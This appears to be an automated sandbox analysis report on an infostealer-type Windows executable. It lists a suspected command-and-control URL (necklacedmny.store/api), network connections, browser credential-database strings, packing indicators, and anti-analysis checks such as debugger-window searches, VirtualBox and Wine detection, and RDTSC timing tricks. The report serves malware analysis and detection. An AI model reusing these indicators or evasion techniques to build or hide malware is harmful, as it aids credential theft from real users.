Source: file.exe, file.exe, 00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202261431.0000000001429000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153485433.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.0000000001429000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126656306.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157189871.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156115915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156552195.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154213981.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154539398.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157640041.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153850742.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157692564.0000000001440000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202292935.0000000001450000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183317892.000000000144F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiB
              Source: file.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiI
              Source: file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apib
              Source: file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apik
              Source: file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apim
              Source: file.exe, 00000000.00000003.2153539401.0000000001429000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apirH
              Source: file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apirX
              Source: file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apis7
              Source: file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apite
              Source: file.exe, 00000000.00000002.2206362809.000000000136E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/jp
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_013D499B 0_3_013D499B
              Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe | Static PE information: Section: ZLIB complexity 0.9979121767241379
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe, 00000000.00000003.2106978801.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C19000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106978801.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083575720.0000000005C38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe | ReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
              Source: file.exe | Static file information: File size 3022848 > 1048576
              Source: file.exe | Static PE information: Raw size of dxfnwksx is bigger than: 0x100000 < 0x2b6400

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;dxfnwksx:EW;neetjkms:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dxfnwksx:EW;neetjkms:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x2ec60f should be: 0x2ebb2b
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name: dxfnwksx
              Source: file.exe | Static PE information: section name: neetjkms
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0143A597 push ss; retf 0_3_0143A5E2
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01439EB3 push 73FB4736h; iretd 0_3_01439EC4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01435E77 push ss; retf 0_3_01435ECC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01435DBF push ss; retf 0_3_01435ECC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0143827E push ecx; ret 0_3_0143829C
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0142A720 push eax; iretd 0_3_0142A721
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0142FC6B push ecx; retf 0002h 0_3_0142FC6C
              Source: file.exe | Static PE information: section name: entropy: 7.97049232338871

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA17CD second address: BA17D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1928 second address: BA1943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1943 second address: BA1947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1947 second address: BA195F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65E53D48BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA195F second address: BA1963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1963 second address: BA196F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA196F second address: BA1975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1975 second address: BA1994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65E53D48BEh 0x00000010 jnc 00007F65E53D48B6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1994 second address: BA1998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1998 second address: BA19B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F65E53D48BFh 0x0000000c jp 00007F65E53D48B6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1D8E second address: BA1DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9526h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA1DA8 second address: BA1DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA20C0 second address: BA20C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3A24 second address: BA3A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c js 00007F65E53D48CBh 0x00000012 jmp 00007F65E53D48C5h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jp 00007F65E53D48BAh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3A9C second address: BA3AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65E53D951Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3C88 second address: BA3CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65E53D48C7h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3CB5 second address: BA3CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BA3CB9 second address: BA3CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F65E53D48BCh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 jng 00007F65E53D48B6h 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB6F42 second address: BB6F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3E54 second address: BC3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3E58 second address: BC3E7C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F65E53D9527h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3E7C second address: BC3E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C2h 0x00000009 jo 00007F65E53D48B6h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3E99 second address: BC3E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3E9F second address: BC3EA9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65E53D48B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3EA9 second address: BC3EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F65E53D951Ah 0x00000012 js 00007F65E53D9516h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3EC8 second address: BC3EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F65E53D48BAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC3EDB second address: BC3EF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F65E53D9524h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC4200 second address: BC4206 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC4206 second address: BC4210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65E53D9522h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC4619 second address: BC461D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC461D second address: BC4635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9522h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC474B second address: BC474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC4A0E second address: BC4A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F65E53D9516h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC506B second address: BC5071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC7FD1 second address: BC7FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC7FD5 second address: BC7FDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC7FDB second address: BC7FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD0447 second address: BD045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BEh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD0593 second address: BD05AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65E53D951Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD05AB second address: BD05BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD0B4C second address: BD0B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F65E53D951Dh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD0CBD second address: BD0CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CD1 second address: BD0CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65E53D9520h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CEB second address: BD0CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CEF second address: BD0CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CF3 second address: BD0CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E4D second address: BD0E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9523h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F65E53D9516h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A44 second address: BD1A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A48 second address: BD1A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A4C second address: BD1A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A52 second address: BD1A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D9524h 0x00000009 rdtsc
